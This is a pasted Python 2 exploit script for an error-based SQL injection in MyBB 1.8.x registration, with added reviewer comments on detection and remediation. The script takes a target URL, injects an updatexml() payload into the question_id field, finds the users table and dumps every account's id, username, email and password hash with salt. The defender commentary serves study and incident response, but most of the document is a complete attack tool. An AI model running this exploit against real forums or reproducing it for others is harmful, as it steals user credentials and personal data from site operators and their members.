Saint1

sql.py

Dec 27th, 2017
  1. #!/usr/bin/env python
  2. # Exploit Title:1.8.X <= 1.8.1 Error based SQL Injection
  3. # Date : 2017-28-12
  4. # Google Dork : intext:Powered By Blablabla
  5. # Version: 1.8.X
  6. # Tested on: Linux / Python 2.7
  7.  
  8. # Status : Patched in MyBB 1.8.2
  9. # Author : Mr.541NT-3DUNT
  10.  
  11.  
  # Banner only: prints ASCII art, the tool name and the author's handle at start-up.
  # It takes no part in the requests made further down.
  12. print """
  13.  
  14.  
  15. ________ ________ _______ ______ __ __
  16. | ____\ \ / / ____|__ __| ____| /\ | \/ |
  17. | |__ \ V /| |__ | | | |__ / \ | \ / |
  18. | __| > < | __| | | | __| / /\ \ | |\/| |
  19. | |____ / . \| |____ | | | |____ / ____ \| | | |
  20. |______/_/ \_\______| |_| |______/_/ \_\_| |_|
  21.  
  22. EXploitExpectedTEAM
  23. Auto Exploiter Sql Injection.
  24. coded By : Mr.541NT-3DUNT
  25. """
  26.  
  27.  
  28.  
  # Runtime inputs (Python 2: raw_input). The prompt text is Indonesian and asks the
  # operator for the target base URL; trailing '/' characters are stripped so that
  # '%s/member.php' in inject() formats without a doubled slash.
  29. url = raw_input('Masukan Target Untuk Di Suntik Mati !!:: ')
  30. url = url.rstrip('/')
  # Fixed Chrome 30 / Windows User-Agent string, sent on every request through the
  # headers= argument in inject(). For log review it is a supporting indicator only:
  # it is a plain constant and says nothing by itself about the request body.
  31. ua = "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.17 Safari/537.36"
  32.  
  33. import sys, re
  34. import urllib2, urllib
  35.  
  36. def inject(sql):
  # Send one crafted registration POST and return the value the database echoes back.
  #
  # What the visible code does: POSTs a fixed set of registration form fields to
  # `<url>/member.php`, with the `question_id` field extended by a URL-quoted
  # `updatexml(NULL,concat (0x3a,(<sql>)),NULL)` expression. This is error-based SQL
  # injection: the result of `sql` does not come back in a normal page but inside the
  # database error text ("XPATH syntax error: ':<value>'") of an HTTP 503 response,
  # which the regex below captures and returns. Every other outcome ends the process
  # through sys.exit.
  #
  # NOTE(review): the paste lost all indentation, so which branch each of the three
  # sys.exit calls belongs to cannot be determined from this listing.
  #
  # Defender view: the request is a registration submit (`action=do_register`) whose
  # `question_id` carries quote characters and an `updatexml(` call, and a vulnerable
  # server answers 503 with "XPATH syntax error" in the body. Both are searchable in
  # request logs / WAF logs and in application error logs. The file header reports the
  # flaw as patched in MyBB 1.8.2. Binding `question_id` as a query parameter closes
  # the injection; suppressing raw database error text in responses removes the
  # error-based read-back used here but does not fix the injection by itself.
  37. try:
  38. urllib2.urlopen(urllib2.Request('%s/member.php' % url, data="regcheck1=&regcheck2=true&username=makman&password=mukarram&password2=mukarram&email=mak@live.com&email2=mak@live.com&referrername=&imagestring=F7yR4&imagehash=1c1d0e6eae9c113f4ff65339e4b3079c&answer=4&allownotices=1&receivepms=1&pmnotice=1&subscriptionmethod=0&timezoneoffset=0&dstcorrection=2&regtime=1416039333&step=registration&action=do_register&regsubmit=Submit+Registration!&question_id=makman%s" % urllib.quote("\' and updatexml(NULL,concat (0x3a,(%s)),NULL) and \'1" % sql), headers={"User-agent": ua}))
  # Python 2 `except X, e` syntax; only HTTP error responses are inspected.
  39. except urllib2.HTTPError, e:
  40. data = e.read()
  # 503 is the status the script expects when the database error page is rendered.
  41. if e.code == 503:
  42. txt = re.search("XPATH syntax error: ':(.*)'", data, re.MULTILINE)
  43. if txt is not None:
  44. return txt.group(1)
  45. sys.exit('Error [3], received unexpected data:\n%s' % data)
  46. sys.exit('Not Vulnerable coeg, Kalo Nyuntik Yang Bener Coeg !!!')
  47. sys.exit('Not Vulnerable, Jarum Suntiknya Pasang Dulu !!')
  48.  
  49. def get(name, table, num):
  # Read column expression `name` from row `num` of `table` through inject().
  # It first asks for LENGTH(...) of the value. Below 31 a single request returns the
  # value; otherwise it is pulled in 31-character SUBSTRING slices and concatenated.
  # NOTE(review): 31 presumably matches how much of the value the error message echoes
  # back; the page does not state this.
  #
  # Defender view: each field costs at least two requests (length, then value), and a
  # successful inject() call only returns after a 503 response. A table dump therefore
  # shows up as a dense burst of near-identical registration POSTs from one client,
  # each answered 503. That rate/sequence pattern is worth alerting on even where
  # request bodies are not logged.
  50. sqli = 'SELECT %s FROM %s LIMIT %d,1' % (name, table, num)
  51. s = int(inject('LENGTH((%s))' % sqli))
  52. if s < 31:
  53. return inject(sqli)
  54. else:
  55. r = ''
  56. for i in range(1, s+1, 31):
  57. r += inject('SUBSTRING((%s), %i, %i)' % (sqli, i, 31))
  58. return r
  59.  
  60.  
  # Driver: find the user table, count its rows, then print four fields per row.
  # 0x757365727324 is the hex encoding of "users$", so the lookup selects a table in
  # the current schema whose name ends in "users", whatever the table prefix is.
  61. members_table= inject('select table_name from information_schema.tables where table_schema=database() and table_name regexp 0x757365727324 limit 0,1')
  62. n = inject('SELECT COUNT(*) FROM %s' % members_table)
  63. print '----------------------------------------------------------------------------'
  64. print '* Found %s users' % n
  65. print '----------------------------------------------------------------------------'
  # Fields read for every row: uid, username, email, and password joined to salt with
  # ':' (0x3a). Incident-response consequence: where logs show this traffic against an
  # install older than the fixed release named in the file header, these columns should
  # be treated as disclosed for all accounts. That means forcing password resets
  # (the password column is presumably a salted hash; confirm against the schema) and
  # expecting the e-mail addresses to be used for phishing.
  66. for j in range(int(n)):
  67. print '{:20s} {:20s}'.format('Id',get('uid', members_table, j))
  68. print '{:20s} {:20s}'.format('Name',get('username', members_table, j))
  69. print '{:20s} {:20s}'.format('Email',get('email', members_table, j))
  70. print '{:20s} {:20s}'.format('Password : Salt',get('CONCAT(password,0x3a,salt)', members_table, j))
  71. print '----------------------------------------------------------------------------'